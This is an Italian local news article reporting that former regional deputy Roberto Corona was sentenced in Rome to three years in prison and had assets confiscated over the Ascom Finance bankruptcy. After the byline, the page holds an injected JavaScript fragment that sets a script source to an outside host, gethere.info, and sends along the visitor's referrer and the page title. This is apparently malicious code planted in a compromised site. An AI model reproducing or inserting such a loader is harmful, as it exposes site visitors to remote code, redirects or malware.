Processo Ascom Finance: L’ex deputato aluntino Roberto Corona condannato a 3 anni di reclusione

corona

Tre anni di reclusione e beni confiscati per quasi 650.000 euro. Questa la sentenza emessa dalla Quarta sezione del tribunale di Roma che ha condannato l’ex deputato regionale di Forza Italia ROBERTO CORONA (foto in alto), originario di San Marco d’Alunzio, ex presidente e plenipotenziario della Confcommercio di Messina. La vicenda sfociata nella condanna è quella relativa al procedimento nato per il “buco nero” ed il conseguente fallimento della Ascom Finance…

Si è concluso con la condanna a 3 anni di reclusione e la confisca di quasi 650.000 euro di beni il processo nei confronti dell’ex deputato regionale di Forza Italia Roberto Corona, originario di San Marco d’Alunzio, nato dalla “costola romana” del procedimento sulla Ascom Finance ed il “buco nero” della società sfociata nel fallimento. La Quarta sezione penale del tribunale di Roma ha condannato l’ex onorevole Corona quasi in toto con le richieste avanzate dal pm al termine della requisitoria (3 anni e 6 mesi+50.000 euro di multa). La Corte ha inoltre deciso la confisca dei beni, al tempo sequestrati all’on. Corona, esattamente per 647.500 euro e il risarcimento, da liquidarsi in separata sede, alle parti civili costituite: Fallimento Ascom Finance e Banca d’Italia. Il processo nei confronti di Roberto Corona si era aperto nel 2012 con il rito ordinario con altri imputati che hanno scelto vie alternative tra abbreviati e patteggiamenti di pena. Secondo l’accusa contestata, la Ascom Finance rilasciava fidejussioni senza la necessaria copertura prevista dalla legge. Roberto Corona era stato eletto all’Ars alle elezioni del 2008 nel gruppo del PdL, aderendo poi a Forza Italia. Per anni è stato il presidente ed il plenipotenziario della Confcommercio di Messina, sino alla caduta a seguito della vicenda giudiziaria che, nel dicembre 2011, lo portò all’arresto eseguito dalla guardia di finanza.   

Giuseppe Lazzaro

Edited by, venerdì 19 febbraio 2016, ore 11,07. s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

(Visited 1.320 times, 1 visits today)